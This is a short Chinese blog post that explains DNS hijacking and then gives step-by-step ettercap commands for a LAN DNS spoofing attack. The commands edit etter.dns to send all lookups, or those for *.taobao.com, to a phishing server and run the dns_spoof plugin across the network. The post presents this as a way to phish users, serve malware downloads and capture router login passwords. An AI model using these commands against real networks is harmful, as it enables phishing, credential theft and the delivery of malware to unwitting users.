DNS劫持

DNS劫持

  • DNS劫持简介

    DNS(Domain Name System,域名系统),在互联网上作为域名和IP地址相互映射的一个分布式数据库。DNS劫持又称为域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,或者返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能反应或者访问的是假网址。

    DNS被劫持后,常见的攻击行为主要有网络钓鱼、干扰用户正常访问网络、威胁用户账号信息及财产安全等。

  • 使用ettercap进行DNS劫持

    网关192.168.0.1 目标192.168.0.205 本机192.168.0.203 钓鱼服务器192.168.0.207

    典型步骤:
    1:编辑ettercap的规则文件,修改DNS解析(最末端)
    	nano /etc/ettercap/etter.dns	*A 192.168.0.207	把所有解析劫持到此IP
    				或			  *.taobao.com A 192.168.0.207	添加正向解析
    							   *.taobao.com PTR 192.168.0.207	添加反向解析
    2:在钓鱼服务器搭建网页或者恶意软件下载
    3:使用ettercap及dns_spoof插件进行全网劫持
    	ettercap -Tq -i eth0 -P dns_spoof /// ///
    	
    	可以在cmd下使用ipconfig/flushdns命令刷新DNS缓存
    	也可使用图形界面进行劫持
    	可以成为钓鱼获取无线路由器登录密码的方法补充
    
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值